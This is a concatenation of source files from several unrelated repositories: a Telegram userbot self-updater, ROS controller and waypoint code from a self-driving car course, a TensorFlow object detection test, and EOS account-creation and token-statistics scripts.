await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
```
#### File: userbot/plugins/updater.py
```python
from os import remove, execle, path, makedirs, getenv, environ
from shutil import rmtree
import asyncio
import sys
from git import Repo
from git.exc import GitCommandError, InvalidGitRepositoryError, NoSuchPathError
from userbot import CMD_HELP, bot
from userbot.utils import register
from var import Var
HEROKU_API_KEY = Var.HEROKU_API_KEY
HEROKU_APP_NAME = Var.HEROKU_APP_NAME
requirements_path = path.join(
path.dirname(path.dirname(path.dirname(__file__))), 'requirements.txt')
UPSTREAM_REPO_URL = "https://github.com/100101110/userbot-100101110.git"
async def gen_chlog(repo, diff):
ch_log = ''
d_form = "%d/%m/%y"
for c in repo.iter_commits(diff):
ch_log += f'•[{c.committed_datetime.strftime(d_form)}]: {c.summary} <{c.author}>\n'
return ch_log
async def update_requirements():
reqs = str(requirements_path)
try:
process = await asyncio.create_subprocess_shell(
' '.join([sys.executable, "-m", "pip", "install", "-r", reqs]),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE)
await process.communicate()
return process.returncode
except Exception as e:
return repr(e)
@register(outgoing=True, pattern=r"^\.update(?: |$)(.*)")
async def upstream(ups):
"For .update command, check if the bot is up to date, update if specified"
await ups.edit('**Ricerca update in corso....**')
conf = ups.pattern_match.group(1)
off_repo = UPSTREAM_REPO_URL
force_update = False
try:
txt = "`Oops.. Updater cannot continue due to "
txt += "some problems occured`\n\n**LOGTRACE:**\n"
repo = Repo()
except NoSuchPathError as error:
await ups.edit(f'{txt}\n`directory {error} is not found`')
repo.__del__()
return
except GitCommandError as error:
await ups.edit(f'{txt}\n`Early failure! {error}`')
repo.__del__()
return
except InvalidGitRepositoryError as error:
if conf != "now":
await ups.edit(
f"Unfortunately, the directory {error} does not seem to be a git repository.\
\nBut we can fix that by force updating the userbot using `.update now.`"
)
return
repo = Repo.init()
origin = repo.create_remote('upstream', off_repo)
origin.fetch()
force_update = True
repo.create_head('master', origin.refs.master)
repo.heads.master.set_tracking_branch(origin.refs.master)
repo.heads.master.checkout(True)
ac_br = repo.active_branch.name
if ac_br != 'master':
await ups.edit(
f'**[UPDATER]: Sembra che stai utilizzando un ramo custom** ({ac_br}). '
'**in tal caso, Updater è in grado di identificare**'
'**quale ramo deve essere unito.**'
'**Per favore aggiorna a qualsiasi branch ufficiale**')
repo.__del__()
return
try:
repo.create_remote('upstream', off_repo)
except BaseException:
pass
ups_rem = repo.remote('upstream')
ups_rem.fetch(ac_br)
changelog = await gen_chlog(repo, f'HEAD..upstream/{ac_br}')
if not changelog and not force_update:
await ups.edit(
f'\n`Il tuo UbOT è` **up-to-date** **{ac_br}**\n')
repo.__del__()
return
if conf != "now" and not force_update:
changelog_str = f'**New UPDATE avviabile per [{ac_br}]:\n\nCHANGELOG:**\n`{changelog}`'
if len(changelog_str) > 4096:
await ups.edit('**Il changelog delle modifiche è troppo grande,leggi il file.**')
file = open("output.txt", "w+")
file.write(changelog_str)
file.close()
await ups.client.send_file(
ups.chat_id,
"output.txt",
reply_to=ups.id,
)
remove("output.txt")
else:
await ups.edit(changelog_str)
await ups.respond('Premi \"`.update now`\" per aggiornare')
return
if force_update:
await ups.edit(
'**Forza aggiornamento ubot code stabile, attendere...**')
else:
await ups.edit('**Ubot in aggiornamento attendere....**')
# We're in a Heroku Dyno, handle it's memez.
if HEROKU_API_KEY is not None:
import heroku3
heroku = heroku3.from_key(HEROKU_API_KEY)
heroku_app = None
heroku_applications = heroku.apps()
if not HEROKU_APP_NAME:
await ups.edit(
'**Invalid APP Name. Inserisci il nome del bot nella Var `HEROKU_APP_NAME.**'
)
repo.__del__()
return
for app in heroku_applications:
if app.name == HEROKU_APP_NAME:
heroku_app = app
break
if heroku_app is None:
await ups.edit(
f'{txt}\n**Credenziali heroku invalide per aggiornare Ubot.**'
)
repo.__del__()
return
await ups.edit('`Ubot dyno in progressione, attendi 5 mins il completamento.s`'
)
ups_rem.fetch(ac_br)
repo.git.reset("--hard", "FETCH_HEAD")
heroku_git_url = heroku_app.git_url.replace(
"https://", "https://api:" + HEROKU_API_KEY + "@")
if "heroku" in repo.remotes:
remote = repo.remote("heroku")
remote.set_url(heroku_git_url)
else:
remote = repo.create_remote("heroku", heroku_git_url)
try:
remote.push(refspec="HEAD:refs/heads/master", force=True)
except GitCommandError as error:
await ups.edit(f'{txt}\n`Here is the error log:\n{error}`')
repo.__del__()
return
await ups.edit('**Update in corso...**\n'
'**Riavvio, attendi 5 minuti e premi `.alive`**')
else:
# Classic Updater, pretty straightforward.
try:
ups_rem.pull(ac_br)
except GitCommandError:
repo.git.reset("--hard", "FETCH_HEAD")
reqs_upgrade = await update_requirements()
await ups.edit('**Update in corso...**\n'
'**Attendi 5 minuti e premi `.alive`**')
# Spin a new instance of bot
args = [sys.executable, "-m", "userbot"]
execle(sys.executable, *args, environ)
return
CMD_HELP.update({
'update':
".update\
\nUsage: Checks if the main userbot repository has any updates and shows a changelog if so.\
\n\n.update now\
\nUsage: Updates your userbot, if there are any updates in the main userbot repository."
})
``` |
{
"source": "4artit/CARND_Term3_Programming-a-Real-Self-Driving-Car",
"score": 3
} |
#### File: src/twist_controller/twist_controller.py
```python
from pid import PID
from yaw_controller import YawController
from lowpass import LowPassFilter
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, *args):
        # for calculating brake torque [N*m]
self.total_mass = args[4] + args[5] * GAS_DENSITY
self.wheel_radius = args[6]
self.yaw_controller = YawController(args[0], args[1], 0.15, args[2], args[3])
self.pid = PID(0.0198, 0.0002, 0.0064, -1.0, 0.35)
# tau = 0.01, ts = 50Hz -> 20ms
self.lowpass_filter = LowPassFilter(0.01, 0.02)
def control(self, *args):
target_linear_vel = args[0]
target_angular_vel = args[1]
current_linear_vel = args[2]
is_enable_dbw = args[3]
throttle = 0.0
brake = 0.0
steer = 0.0
if is_enable_dbw is False:
self.pid.reset()
else:
steer = self.yaw_controller.get_steering(target_linear_vel, target_angular_vel, current_linear_vel)
cte = ((target_linear_vel - current_linear_vel) / ONE_MPH)
throttle = self.lowpass_filter.filt(self.pid.step(cte, 0.02))
# if car need decel
if throttle < 0.0:
throttle = 0.0
decel = (current_linear_vel - target_linear_vel) / 0.02
# calculate about car braking torque in wheel
brake = self.total_mass * decel * self.wheel_radius
return throttle, brake, steer
```
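A standalone arithmetic sketch of the braking-torque formula used in `Controller.control` (`total_mass * decel * wheel_radius`); the vehicle numbers below are assumptions, not values taken from this repository.
```python
# Worked example with assumed vehicle parameters.
GAS_DENSITY = 2.858            # kg per gallon, as defined in the module above

vehicle_mass = 1736.35         # kg (assumed)
fuel_capacity = 13.5           # gallons (assumed)
wheel_radius = 0.2413          # m (assumed)

total_mass = vehicle_mass + fuel_capacity * GAS_DENSITY   # ~1774.9 kg
decel = 1.0                                               # m/s^2, assumed deceleration demand
brake_torque = total_mass * decel * wheel_radius          # ~428.3 N*m
print(round(brake_torque, 1))
```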
#### File: src/waypoint_updater/waypoint_updater.py
```python
import rospy
from geometry_msgs.msg import PoseStamped
from styx_msgs.msg import Lane, Waypoint
import math
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO (for Yousuf and Aaron): Stopline location for each traffic light.
'''
LOOKAHEAD_WPS = 50 # Number of waypoints we will publish. You can change this number
class WaypointUpdater(object):
def __init__(self):
rospy.init_node('waypoint_updater')
rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
# TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)
# TODO: Add other member variables you need below
self.base_waypoints = None
self.base_wp_size = 0
self.has_base_wp = False
self.is_initialized = False
self.current_pos_index = 0
self.final_waypoints = Lane()
rospy.spin()
def pose_cb(self, msg):
# Check has base waypoints and find min distance waypoint
if self.has_base_wp is True:
index = self.current_pos_index
diff_x = msg.pose.position.x - self.base_waypoints[index].pose.pose.position.x
diff_y = msg.pose.position.y - self.base_waypoints[index].pose.pose.position.y
min_dist = diff_x ** 2 + diff_y ** 2
waypoint_size = 0
            # If not yet initialized, search all base waypoints; afterwards only search a
            # window of LOOKAHEAD_WPS waypoints ahead of the previously found index
            if self.is_initialized is False:
                waypoint_size = self.base_wp_size
                self.is_initialized = True
            else:
                waypoint_size = LOOKAHEAD_WPS
            for i in range(1, waypoint_size):
                candidate = (self.current_pos_index + i) % self.base_wp_size
                diff_x = msg.pose.position.x - self.base_waypoints[candidate].pose.pose.position.x
                diff_y = msg.pose.position.y - self.base_waypoints[candidate].pose.pose.position.y
                dist = diff_x ** 2 + diff_y ** 2
                if dist < min_dist:
                    min_dist = dist
                    index = candidate
            # Check whether the closest waypoint is ahead of the car using the dot product
if index + 1 == self.base_wp_size:
next_index = 0
else:
next_index = index + 1
a_vector_x = self.base_waypoints[next_index].pose.pose.position.x - self.base_waypoints[index].pose.pose.position.x
a_vector_y = self.base_waypoints[next_index].pose.pose.position.y - self.base_waypoints[index].pose.pose.position.y
b_vector_x = msg.pose.position.x - self.base_waypoints[index].pose.pose.position.x
b_vector_y = msg.pose.position.y - self.base_waypoints[index].pose.pose.position.y
cos_theta = (a_vector_x * b_vector_x + a_vector_y * b_vector_y) / (math.sqrt(a_vector_x ** 2 + a_vector_y ** 2) * math.sqrt(b_vector_x ** 2 + b_vector_y ** 2))
if cos_theta >= 0:
index = next_index
self.current_pos_index = index
# publish final waypoints
self.final_waypoints.waypoints = []
for i in range(LOOKAHEAD_WPS):
self.final_waypoints.waypoints.append(self.base_waypoints[(index + i)%self.base_wp_size])
self.final_waypoints_pub.publish(self.final_waypoints)
def waypoints_cb(self, waypoints):
# Save base waypoints and waypoints list size
self.base_waypoints = waypoints.waypoints
self.base_wp_size = len(waypoints.waypoints)
if self.has_base_wp is False:
self.has_base_wp = True
def traffic_cb(self, msg):
# TODO: Callback for /traffic_waypoint message. Implement
pass
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
``` |
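A standalone sketch of the dot-product test in `pose_cb` that decides whether the closest base waypoint is already behind the car (in which case publishing starts from the next one); the coordinates are invented.
```python
import math

wp      = (10.0, 0.0)   # closest base waypoint (assumed coordinates)
next_wp = (11.0, 0.0)   # the waypoint that follows it
car     = (10.4, 0.2)   # current car pose

ax, ay = next_wp[0] - wp[0], next_wp[1] - wp[1]   # vector wp -> next_wp
bx, by = car[0] - wp[0], car[1] - wp[1]           # vector wp -> car
cos_theta = (ax * bx + ay * by) / (math.hypot(ax, ay) * math.hypot(bx, by))
start_from_next = cos_theta >= 0   # True: the car has passed wp, publish from next_wp
print(start_from_next)
```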
{
"source": "4artit/human_detection_ros_node_using_2d-lidar_TX2-onboard-cam_fusion",
"score": 2
} |
#### File: human_detection_ros_node_using_2d-lidar_TX2-onboard-cam_fusion/py_scripts/test_objectdetection.py
```python
import numpy as np
import os
import sys
import tensorflow as tf
import cv2
import datetime
# Root directory of the project
ROOT_DIR = os.path.abspath("../src/realtime_object_detection")
sys.path.append(ROOT_DIR)
from helper import Timer, WebcamVideoStream, SessionWorker, TimeLiner, load_images
from model import Model
from config import Config
from vis_utils import visualize_objectdetection
from tf_utils import reframe_box_masks_to_image_masks
def detection(model,config):
# Tf Session
tf_config = model.tf_config
detection_graph = model.detection_graph
category_index = model.category_index
print("> Building Graph")
with detection_graph.as_default():
with tf.Session(graph=detection_graph,config=tf_config) as sess:
# start Videostream
# Define Input and Ouput tensors
tensor_dict = model.get_tensordict(['num_detections', 'detection_boxes', 'detection_scores','detection_classes', 'detection_masks'])
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Mask Transformations
if 'detection_masks' in tensor_dict:
# Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.
detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])
detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])
real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)
detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])
detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])
detection_masks_reframed = reframe_box_masks_to_image_masks(
detection_masks, detection_boxes, config.HEIGHT, config.WIDTH)
detection_masks_reframed = tf.cast(tf.greater(detection_masks_reframed, 0.5), tf.uint8)
# Follow the convention by adding back the batch dimension
tensor_dict['detection_masks'] = tf.expand_dims(detection_masks_reframed, 0)
if config.SPLIT_MODEL:
score_out = detection_graph.get_tensor_by_name('Postprocessor/convert_scores:0')
expand_out = detection_graph.get_tensor_by_name('Postprocessor/ExpandDims_1:0')
score_in = detection_graph.get_tensor_by_name('Postprocessor/convert_scores_1:0')
expand_in = detection_graph.get_tensor_by_name('Postprocessor/ExpandDims_1_1:0')
# Threading
score = model.score
expand = model.expand
# Timeliner
if config.WRITE_TIMELINE:
options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
timeliner = TimeLiner()
else:
options = tf.RunOptions(trace_level=tf.RunOptions.NO_TRACE)
run_metadata = False
images = load_images(config.IMAGE_PATH,config.LIMIT_IMAGES)
timer = Timer().start()
print('> Starting Detection')
for image in images:
if config.SPLIT_MODEL:
# split model in seperate gpu and cpu session threads
masks = None # No Mask Detection possible yet
frame = cv2.resize(cv2.imread(image),(config.WIDTH,config.HEIGHT))
frame_expanded = np.expand_dims(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), axis=0)
timer.tic()
# GPU Session
score, expand = sess.run([score_out, expand_out],
feed_dict={image_tensor: frame_expanded},
options=options, run_metadata=run_metadata)
timer.tictic()
if config.WRITE_TIMELINE:
timeliner.write_timeline(run_metadata.step_stats,
'test_results/timeline_{}{}{}{}.json'.format(
config.OD_MODEL_NAME,'_SM1',config._DEV,config._OPT))
timer.tic()
# CPU Session
boxes, scores, classes, num = sess.run(
[tensor_dict['detection_boxes'], tensor_dict['detection_scores'], tensor_dict['detection_classes'], tensor_dict['num_detections']],
feed_dict={score_in:score, expand_in: expand},
options=options, run_metadata=run_metadata)
timer.toc()
if config.WRITE_TIMELINE:
timeliner.write_timeline(run_metadata.step_stats,
'test_results/timeline_{}{}{}{}.json'.format(
config.OD_MODEL_NAME,'_SM2',config._DEV,config._OPT))
else:
# default session
frame = cv2.resize(cv2.imread(image),(config.WIDTH,config.HEIGHT))
frame_expanded = np.expand_dims(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), axis=0)
timer.tic()
output_dict = sess.run(tensor_dict,
feed_dict={image_tensor: frame_expanded},
options=options, run_metadata=run_metadata)
timer.toc()
if config.WRITE_TIMELINE:
timeliner.write_timeline(run_metadata.step_stats,
'test_results/timeline_{}{}{}.json'.format(
config.OD_MODEL_NAME,config._DEV,config._OPT))
num = output_dict['num_detections'][0]
classes = output_dict['detection_classes'][0]
boxes = output_dict['detection_boxes'][0]
scores = output_dict['detection_scores'][0]
if 'detection_masks' in output_dict:
masks = output_dict['detection_masks'][0]
else:
masks = None
# reformat detection
num = int(num)
boxes = np.squeeze(boxes)
classes = np.squeeze(classes).astype(np.uint8)
scores = np.squeeze(scores)
# Visualization
vis = visualize_objectdetection(frame,boxes,classes,scores,masks,category_index,timer.get_frame(),
config.MAX_FRAMES,timer.get_fps(),config.PRINT_INTERVAL,config.PRINT_TH,
config.OD_MODEL_NAME+config._DEV+config._OPT,config.VISUALIZE)
if not vis:
break
cv2.destroyAllWindows()
timer.stop()
if __name__ == '__main__':
config = Config()
config.display()
model = Model('od', config.OD_MODEL_NAME, config.OD_MODEL_PATH, config.LABEL_PATH,
config.NUM_CLASSES, config.SPLIT_MODEL, config.SSD_SHAPE).prepare_od_model()
detection(model,config)
```
#### File: src/realtime_object_detection/tf_utils.py
```python
import logging
import tensorflow as tf
from google.protobuf import text_format
try:
from realtime_object_detection.protos import string_int_label_map_pb2
except:
print("> running local python script")
from protos import string_int_label_map_pb2
def reframe_box_masks_to_image_masks(box_masks, boxes, image_height,
image_width):
"""Transforms the box masks back to full image masks.
Embeds masks in bounding boxes of larger masks whose shapes correspond to
image shape.
Args:
box_masks: A tf.float32 tensor of size [num_masks, mask_height, mask_width].
boxes: A tf.float32 tensor of size [num_masks, 4] containing the box
corners. Row i contains [ymin, xmin, ymax, xmax] of the box
corresponding to mask i. Note that the box corners are in
normalized coordinates.
image_height: Image height. The output mask will have the same height as
the image height.
image_width: Image width. The output mask will have the same width as the
image width.
Returns:
A tf.float32 tensor of size [num_masks, image_height, image_width].
"""
def transform_boxes_relative_to_boxes(boxes, reference_boxes):
boxes = tf.reshape(boxes, [-1, 2, 2])
min_corner = tf.expand_dims(reference_boxes[:, 0:2], 1)
max_corner = tf.expand_dims(reference_boxes[:, 2:4], 1)
transformed_boxes = (boxes - min_corner) / (max_corner - min_corner)
return tf.reshape(transformed_boxes, [-1, 4])
box_masks = tf.expand_dims(box_masks, axis=3)
num_boxes = tf.shape(box_masks)[0]
unit_boxes = tf.concat(
[tf.zeros([num_boxes, 2]), tf.ones([num_boxes, 2])], axis=1)
reverse_boxes = transform_boxes_relative_to_boxes(unit_boxes, boxes)
image_masks = tf.image.crop_and_resize(image=box_masks,
boxes=reverse_boxes,
box_ind=tf.range(num_boxes),
crop_size=[image_height, image_width],
extrapolation_value=0.0)
return tf.squeeze(image_masks, axis=3)
def load_labelmap(path):
"""Loads label map proto.
Args:
path: path to StringIntLabelMap proto text file.
Returns:
a StringIntLabelMapProto
"""
with tf.gfile.GFile(path, 'r') as fid:
label_map_string = fid.read()
label_map = string_int_label_map_pb2.StringIntLabelMap()
try:
text_format.Merge(label_map_string, label_map)
except text_format.ParseError:
label_map.ParseFromString(label_map_string)
_validate_label_map(label_map)
return label_map
def convert_label_map_to_categories(label_map,
max_num_classes,
use_display_name=True):
"""Loads label map proto and returns categories list compatible with eval.
This function loads a label map and returns a list of dicts, each of which
has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
We only allow class into the list if its id-label_id_offset is
between 0 (inclusive) and max_num_classes (exclusive).
If there are several items mapping to the same id in the label map,
we will only keep the first one in the categories list.
Args:
label_map: a StringIntLabelMapProto or None. If None, a default categories
list is created with max_num_classes categories.
max_num_classes: maximum number of (consecutive) label indices to include.
use_display_name: (boolean) choose whether to load 'display_name' field
as category name. If False or if the display_name field does not exist,
uses 'name' field as category names instead.
Returns:
categories: a list of dictionaries representing all possible categories.
"""
categories = []
list_of_ids_already_added = []
if not label_map:
label_id_offset = 1
for class_id in range(max_num_classes):
categories.append({
'id': class_id + label_id_offset,
'name': 'category_{}'.format(class_id + label_id_offset)
})
return categories
for item in label_map.item:
if not 0 < item.id <= max_num_classes:
logging.info('Ignore item %d since it falls outside of requested '
'label range.', item.id)
continue
if use_display_name and item.HasField('display_name'):
name = item.display_name
else:
name = item.name
if item.id not in list_of_ids_already_added:
list_of_ids_already_added.append(item.id)
categories.append({'id': item.id, 'name': name})
return categories
def create_category_index(categories):
"""Creates dictionary of COCO compatible categories keyed by category id.
Args:
categories: a list of dicts, each of which has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
Returns:
category_index: a dict containing the same entries as categories, but keyed
by the 'id' field of each category.
"""
category_index = {}
for cat in categories:
category_index[cat['id']] = cat
return category_index
def _validate_label_map(label_map):
"""Checks if a label map is valid.
Args:
label_map: StringIntLabelMap to validate.
Raises:
ValueError: if label map is invalid.
"""
for item in label_map.item:
if item.id < 1:
raise ValueError('Label map ids should be >= 1.')
``` |
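A short sketch of the fallback path in `convert_label_map_to_categories` / `create_category_index` when no label map is supplied; the import path is assumed from the package name used above.
```python
# Sketch only; assumes the module is importable as realtime_object_detection.tf_utils.
from realtime_object_detection.tf_utils import (convert_label_map_to_categories,
                                                create_category_index)

categories = convert_label_map_to_categories(None, max_num_classes=3)
# [{'id': 1, 'name': 'category_1'}, {'id': 2, 'name': 'category_2'}, {'id': 3, 'name': 'category_3'}]
category_index = create_category_index(categories)
print(category_index[2]['name'])   # category_2
```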
{
"source": "4ban/volentix_tools",
"score": 2
} |
#### File: volentix_tools/creator/runner.py
```python
from pymongo import MongoClient
import logging
import configparser
import json
import subprocess
import os
import time
import random
def execute(key, name):
out = ''
try:
out = subprocess.run(['cleos', '-u', EOS_RPC, 'system', 'newaccount', EOS_CREATOR, name, key, key, '--stake-net', '0.001 EOS', '--stake-cpu', '0.001 EOS', '--buy-ram-kbytes', '3', '-p' , EOS_CREATOR], timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
out = str(out)
except subprocess.TimeoutExpired as e:
print('FAIL:TIMEOUT: ', key, name)
print('Timeout. Can not execute transaction.\n' + str(e))
logging.error("FAIL:TIMEOUT: %s - %s" % (key, name))
logging.error("Timeout. Can not execute transaction.: %s" % str(e))
return False
except Exception as e:
print('FAIL:EXCEPTION: ', key, name)
print('Could not execute transaction.\n' + str(e))
logging.error("FAIL:EXCEPTION: %s - %s" % (key, name))
logging.error("Could not execute transaction: %s" % str(e))
return False
else:
if 'Error' in out:
print('FAIL:ERROR: ', key, name)
print(out)
logging.error("FAIL:ERROR: %s - %s" % (key, name))
logging.error("%s" % out)
return False
else:
print('PASS: %s - %s' % (key, name))
# print(out)
logging.info("PASS: %s - %s" % (key, name))
logging.info("%s" % out)
return True
def setup():
accounts_to_create = {}
with open('final.list', 'r') as f:
for line in f:
(key, val) = line.replace('\n', '').split('-')
accounts_to_create[key.strip()] = val.strip()
for key, value in accounts_to_create.items():
success = execute(key, value)
if success:
time.sleep(1.5)
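# Input format note (an assumption inferred from the parsing in setup() above):
# each line of 'final.list' is expected to contain a public key and the new
# account name separated by a dash, e.g.
#   <EOS public key> - <new account name>
# so that split('-') yields the (key, name) pair passed to execute().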
if __name__ == "__main__":
filename = 'runner.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('creator_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
EOS_RPC = default.get('EOS_RPC') or ''
EOS_CREATOR = default.get('EOS_CREATOR') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
            TIMEOUT = int(default.get('TIMEOUT') or 10)  # default to 10 s when unset
try:
logging.info('Run runner.')
setup()
except KeyboardInterrupt:
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
logging.error('Exit by other reason: %s', e)
print(e)
```
#### File: volentix_tools/deductor/preparator.py
```python
from pymongo import MongoClient
import logging
import configparser
import requests
import json
import subprocess
import os
import time
import random
import string
# volentixtrez 454990000.0000 VTX
# volentixprvt 65000000.0000 VTX
# volentixprir 130000000.0000 VTX
# vtxsmsupport 99000000.0000 VTX
# vtxmesupport 99000000.0000 VTX
# vtxcontribut 156000000.0000 VTX
# volentixtrus 0.0000 VTX
IGNORE = ['4d8c0d7f1fdbbc3431af5d42b41156fe3e5c71610e8156ced118526585fae93e',
'<KEY>',
'c0eedbf7f9dfe7667215858b5cc9409e0f3392f091db5ae188b8e7d9bc35f58b',
'<KEY>',
'9d654e9f88d877f14872414e1dce1bb7f1418277497d3469f31c6ce4a96b6656',
'0c097f6583fc4bd5ba13f69b4835049fb7454df7997d8a14fa42e339e7efe3be',
'5713b36e24f9c0f8e05629f954b2a1d25818c86aed597a4b2a0e0857825acfec',
'aa76534cad4fd8e05b4eddd9791b3bfad421f6eef266bc835dab1bfd088a88a8',
'<KEY>',
'af7ba352ddf2af60ba76627a0f861281deaf62e3dcd3b6b8a541d016f30b5c4c',
'8c3cebace66ab62f71b58d4a3b67487c4dd29f4fa5522e9d6e60182cc0c5ca52',
'<KEY>',
'448c2308ceec2710a2cf35695718563fa3243d813a6de3669672331a0e4040b4',
'd7096a1e0ef05cf3db73334961283cd038ef30a4094561a92041eaecf9821049',
'8d2be77b12c6084709f0d11aa994fbdb64624ed4102305527155c461cb2826a4',
]
NOT_SURE = ['<KEY>',
'29e5c450ed1b2a22f92670e153cfd35371f62088a04fd3b99e3552ee0c226119',
'<KEY>',
'f0fb35299cd87e5e2567e26d625e7f2320b942bc0ae5254af0842afa8719b5a0',
'<KEY>',
'96fbdb3cc900afbacfe43debbaadfac6430c4dfcef7993afc6ccd7e42abe28b3',
'286c07710de1d5007ffeaf582afe59fa2bd769e80a7ceeb581f5ca22aa2ed312',
'664a97eba801039730f609ef13918c200afd5bb132de27c4a77064c1fb6036b1',
'5b1c371264c3ea00480ef0e60a3d69d433aabef915de3a9d7fe6dc66aa3282e0',
'f4178f2fc31dd30d75df1b03767cba24fa8f3ac738725d8f0d4f46a703ac2b11',
'90bd1ff92bc588648fe00093537c3596415db8efe18ea4f69ae55e9eed1203bc',
'1a886672d7c704e462c9c9459209592261b00d773af9751123b64ebb2d393b4e',
'ada7dbafe02168d63d7c891c9f16c90cc49c20d80de1a7310a0d118cb292b474',
'<KEY>',
'9b8b65d3bea4466bd3e0a28b309f4c96e924b224ea39c540fac4a7ec26ed3fad',
'<KEY>',
'420cfea73ed6b410e62f2d19fac0ca391f2758d566e4ba2ead79cfb2ed63c263',
'1652c961f19a75727b266147f68c03c1e75c3a0538772cfec8f6907c437de8f6',
'54c8ebdc0dc181e937707977206d4de09a3e70a914c72cf52163159747c8a89b',
'd739ee7156c3432c219fb70bafaa4ff41a38df63598a6370c3010b457c67fd52',
'8ecdd32b9c399176ea395cd466a27649e030716ba9818c8b6aca02fb199e75b3',
'2115065c74a2ca19f21a577e24fe5cfdeb0015412ee24a21d2d76c5848fe76e8',
'b3d881bdfb0f4ad694404aa68bd0be764d1f63e9ce5d4a52ac39c1d9dcff50c5',
'5aa4d4d6a84832ea28245a6d8edf632bf55278e0b9057f2aef8511ecc9e64fb3',
'444fc2362e32f49849ccb7768c1222fd399d445674552b1304b1769e3dadff41',
'2e6023872166063ad06b0f6cfe616935f884c109e10b14d30597ea3609f2c7d9',
'ef6aac24992fe3ed827f3bda2234b02d6334852e17b128dfdd5258e020706c03',
'c18b30ee0f576dd8c861fb56f6bfdcbf10449c25979f68a00bacafa636db98ec',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'c9971a942fb9533dab7ad2108bc7cdaacaf62c300547154aff07d8f74722bac6',
]
def get_account(key):
try:
out = subprocess.run(['cleos', '-u', EOS_RPC, 'get', 'accounts', key],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
out = 'Timeout. Can not get accounts\n' + str(e)
except Exception as e:
out = 'Could not get accounts\n' + str(e)
else:
if 'Error' in out:
return out
else:
return json.loads(out)
def get_stats(collection):
# Total tokens will be sent
total_tokens = 0
total_counter = 0
vtxsmsupport = 0
smsu_counter = 0
volentixprvt = 0
prvt_counter = 0
volentixprir = 0
prir_counter = 0
volentixtrez = 0
trez_counter = 0
vtxcontribut = 0
cont_counter = 0
for document in collection.find():
if document['trx_id'] in IGNORE or document['trx_id'] in NOT_SURE:
continue
else:
if float(document['amount']) <= 1000:
total_tokens += float(document['amount'])
total_counter +=1
if document['fromaccount'] == 'vtxsmsupport':
vtxsmsupport += float(document['amount'])
smsu_counter += 1
if document['fromaccount'] == 'volentixprvt':
volentixprvt += float(document['amount'])
prvt_counter += 1
if document['fromaccount'] == 'volentixprir':
volentixprir += float(document['amount'])
prir_counter += 1
if document['fromaccount'] == 'volentixtrez':
volentixtrez += float(document['amount'])
trez_counter += 1
if document['fromaccount'] == 'vtxcontribut':
vtxcontribut += float(document['amount'])
cont_counter += 1
print('total: ', total_tokens, total_counter)
print('vtxsmsupport: ', vtxsmsupport, smsu_counter)
print('volentixprvt: ', volentixprvt, prvt_counter)
print('volentixprir: ', volentixprir, prir_counter)
print('volentixtrez: ', volentixtrez, trez_counter)
print('vtxcontribut: ', vtxcontribut, cont_counter)
def setup():
try:
client = MongoClient(
MONGODB_URL, username=MONGODB_USER, password=<PASSWORD>)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
